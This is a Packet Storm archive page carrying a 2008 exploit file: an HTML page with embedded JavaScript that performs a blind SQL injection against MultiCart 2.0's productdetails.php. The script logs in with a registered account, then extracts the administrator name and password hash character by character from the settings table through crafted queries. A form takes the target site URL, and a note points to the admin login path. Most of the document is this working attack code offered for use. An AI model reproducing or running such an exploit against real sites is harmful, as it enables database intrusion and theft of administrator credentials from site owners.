what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

multicart-blindsql.txt

multicart-blindsql.txt
Posted Feb 21, 2008
Authored by t0pp8uzz, xprog

MultiCart version 2.0 remote SQL injection exploit that leverages productdetails.php.

tags | exploit, remote, php, sql injection
SHA-256 | f43e4fa87bab20064d2c70c73750a5457113930e8a4cdb9c05b9dceb9b9362b6
Download | Favorite | View

multicart-blindsql.txt

Change Mirror Download
<html>
<head>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000;  font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
<title>MultiCart 2.0 Remote SQL Injection Vulnerbility</title>
<script language="Javascript" type="text/javascript">
/*
  -------------------------------------------------------------------------------
  - MultiCart Blind SQL Injection Exploit (productdetails.php) -
  - Info ----------------------------------------------------------------------
  - SAVE AS exploit.HTML and RUN in FIREFOX -----------------
  - Author: t0pP8uZz & xprog -------------------------------------------
  - Exploit Coded By t0pP8uZz -----------------------------------------
  - Site: h4ck-y0u.org / milw0rm.com ---------------------------------
  ------------------------------------------------------------------------------
  - Needs Registration First!           ------------------------------------
  - Peace --------------------------------------------------------------------
  ------------------------------------------------------------------------------
*/

var site, user, pass, tbl, pid, res = "";

function Start() {
  
  site = document.getElementById("site").value;
  user = document.getElementById("user").value;
  pass = document.getElementById("pass").value;
  tbl  = document.getElementById("tbl").value;
  pid  = document.getElementById("pid").value;
  
  Login();
  Main(1, 48);
}

function Main(substr, num) {

  var url = site+"/productdetails.php?productid="+pid+"%20and%20ascii(substring((SELECT concat(admin_name,0x3a,admin_password) FROM "+tbl+"),"+substr+",1))="+num+"/*";
  
  netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
  
  var xmlhttp = new XMLHttpRequest();
  
  xmlhttp.onreadystatechange = function() {
  
    if(xmlhttp.readyState == 4) {
    
      var content = xmlhttp.responseText;
      if(content.match(/doesn't exist/i)) { alert("Table '"+tbl+"' Doesnt Exist! Try Another.."); return false; }
      
      var ele = document.getElementById("output");
      if(!content.match(/SQL syntax/i)) { res += String.fromCharCode((num)); ele.value = res; num = 48; substr++; }
      else { if(num == 59) { num = 96; } else { num++; }}
      
      if(res.match(":")) { 
        var check = res.split(":");
        if(check[1].length >= 32) { alert("Site Exploited! Admin Details: "+res); return true;}
      }
      Main(substr, num);
    }
  };
  xmlhttp.open("GET", url, true);
  xmlhttp.send(null);
};


function Login() {

  var data = 'txtUserName='+user+'&txtPassword='+pass+'&loginbox=+';
  netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
  
  try {
    var xmlhttp = new XMLHttpRequest();
  }
  catch(e) { alert("Use Firefox!\n\n\nError: " + e.description); }
  
  xmlhttp.open("POST", site + "/index.php", true);
  
  xmlhttp.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9");
  xmlhttp.setRequestHeader("Content-Length", data.length);
  xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  
  xmlhttp.send(data);
};
</script>
</head>
<body>
<p class="style1">- MultiCart 2.0 Remote Blind SQL Injection Vulnerbility -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to multicart site ie: http://www.site.com/multicart)</p>
<p class="style2">Table: <input type="text" id="tbl" /> (settings table name, default: "multicart_settings" others used: "mc_settings", "settings")</p>
<p class="style2">User: <input type="text" id="user" /> (Register on the site first, then enter username here)</p>
<p class="style2">Pass: <input type="text" id="pass" /> (Register on the site first, then enter password here)</p>
<p class="style2">PID: <input type="text" id="pid" /> (a valid product ID)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output: <input type="text" id="output" size="100" /></p>
<p class="style2">Notes: MultiCart uses the MD5 algorithms, The admin login is at /admin/</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close